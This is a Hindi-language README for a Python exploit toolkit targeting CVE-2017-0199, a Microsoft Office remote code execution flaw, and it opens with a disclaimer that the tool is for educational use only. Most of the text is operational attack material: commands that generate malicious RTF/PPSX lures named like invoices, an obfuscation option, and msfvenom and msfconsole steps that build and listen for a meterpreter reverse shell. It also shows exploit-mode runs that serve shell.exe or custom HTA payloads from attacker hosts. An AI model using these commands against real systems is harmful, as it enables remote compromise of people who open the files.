
Exploit toolkit CVE-2017-0199 - v4.0 एक उपयोगी python स्क्रिप्ट है जो पेंटेस्टर्स और सुरक्षा शोधकर्ताओं को Microsoft Office RCE का परीक्षण करने का एक त्वरित और प्रभावी तरीका प्रदान करती है। यह एक दुर्भावनापूर्ण RTF/PPSX फ़ाइल उत्पन्न कर सकती है और बिना किसी जटिल कॉन्फ़िगरेशन के पीड़ित को metasploit / meterpreter / अन्य payload पहुंचा सकती है।
एक्सप्लॉइट टूलकिट CVE-2017-0199 - v4.0 एक उपयोगी पायथन स्क्रिप्ट है जो पेंटेस्टर्स और सुरक्षा शोधकर्ताओं को माइक्रोसॉफ्ट ऑफिस RCE का परीक्षण करने का एक त्वरित और प्रभावी तरीका प्रदान करती है। यह किसी भी जटिल कॉन्फ़िगरेशन के बिना एक दुर्भावनापूर्ण RTF/PPSX फ़ाइल उत्पन्न कर सकता है और पीड़ित को metasploit / meterpreter / अन्य पेलोड वितरित कर सकता है।
यह प्रोग्राम केवल शैक्षिक उद्देश्य के लिए है। बिना अनुमति के इसका उपयोग न करें। सामान्य अस्वीकरण लागू होता है, विशेष रूप से यह तथ्य कि मैं (bhdresh) इन प्रोग्रामों द्वारा प्रदान की गई जानकारी या कार्यक्षमता के प्रत्यक्ष या अप्रत्यक्ष उपयोग से होने वाली किसी भी क्षति के लिए उत्तरदायी नहीं हूँ। लेखक या कोई भी इंटरनेट प्रदाता इन प्रोग्रामों या उनके किसी भी व्युत्पन्न की सामग्री या दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। इस प्रोग्राम का उपयोग करके आप इस तथ्य को स्वीकार करते हैं कि इन प्रोग्रामों के उपयोग से होने वाली कोई भी क्षति (डेटा हानि, सिस्टम क्रैश, सिस्टम समझौता, आदि) bhdresh की जिम्मेदारी नहीं है।
अंत में, यह एक व्यक्तिगत विकास है, कृपया इसके दर्शन का सम्मान करें और इसका उपयोग बुरे कामों के लिए न करें!
CC BY 4.0 लाइसेंस - https://creativecommons.org/licenses/by/4.0/
स्क्रिप्ट में निम्नलिखित क्षमताएँ जोड़ी गईं
- दुर्भावनापूर्ण PPSX फ़ाइल उत्पन्न करें
- उत्पन्न PPSX फ़ाइल के लिए शोषण मोड
- अपडेटेड template.ppsx
संस्करण: पायथन संस्करण 2.7.13
1) दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (वैकल्पिक, यदि MSF पेलोड का उपयोग कर रहे हैं): मेटास्प्लॉइट पेलोड उत्पन्न करें और हैंडलर शुरू करें
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) स्थानीय पेलोड वितरित करने के लिए शोषण मोड में टूलकिट शुरू करें
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

1) दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) रिमोट पेलोड वितरित करने के लिए शोषण मोड में टूलकिट शुरू करें
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe

1) दुर्भावनापूर्ण RTF फ़ाइल उत्पन्न करें
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) कस्टम HTA फ़ाइल वितरित करने के लिए शोषण मोड में टूलकिट शुरू करें
# python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta

# python cve-2017-0199_toolkit.py -h
यह CVE-2017-0199 (माइक्रोसॉफ्ट ऑफिस RCE) का शोषण करने के लिए एक उपयोगी टूलकिट है।
मोड:
-M gen केवल दुर्भावनापूर्ण फ़ाइल उत्पन्न करें
दुर्भावनापूर्ण RTF/PPSX फ़ाइल उत्पन्न करें:
-w <Filename.rtf/Filename.ppsx> दुर्भावनापूर्ण RTF/PPSX फ़ाइल का नाम (यह फ़ाइल पीड़ित के साथ साझा करें)।
-u <http://attacker.com/test.hta> HTA/SCT फ़ाइल का पथ। सामान्यतः, यह एक डोमेन या IP होना चाहिए जहाँ यह टूल चल रहा हो।
उदाहरण के लिए, http://attackerip.com/test.doc (यह URL दुर्भावनापूर्ण RTF/PPSX फ़ाइल में शामिल किया जाएगा और पीड़ित द्वारा दुर्भावनापूर्ण RTF फ़ाइल खोलने पर अनुरोध किया जाएगा)।
-t RTF|PPSX (default = RTF) उत्पन्न की जाने वाली फ़ाइल का प्रकार।
-x 0|1 (default = 0) अस्पष्ट RTF फ़ाइल उत्पन्न करें। 0 = अक्षम, 1 = सक्षम।
-M exp शोषण मोड शुरू करें
शोषण:
-t RTF|PPSX (default = RTF) शोषण की जाने वाली फ़ाइल का प्रकार।
-H </tmp/custom> कस्टम HTA/SCT फ़ाइल का स्थानीय पथ जिसे लक्ष्य पर वितरित और निष्पादित किया जाना है।
नोट: यह विकल्प "-e" और "-l" विकल्पों के माध्यम से निर्दिष्ट पेलोड वितरित नहीं करेगा।
-p <TCP port:Default 80> स्थानीय पोर्ट नंबर।
-e <http://attacker.com/shell.exe> एक निष्पादन योग्य फ़ाइल / मीटरप्रेटर शेल / पेलोड का पथ जिसे लक्ष्य पर निष्पादित किया जाना है।
-l </tmp/shell.exe> यदि पेलोड स्थानीय रूप से होस्ट किया गया है, तो निष्पादन योग्य फ़ाइल / मीटरप्रेटर शेल / पेलोड का स्थानीय पथ निर्दिष्ट करें।
@nixawk RTF नमूने के लिए, @Li Haifei, @bhdresh
जाहिर है, मैं पूर्णकालिक डेवलपर नहीं हूँ, इसलिए कुछ रुकावटों की उम्मीद करें
कृपया बग और समस्याएँ https://github.com/bhdresh/CVE-2017-0199/issues/new पर रिपोर्ट करें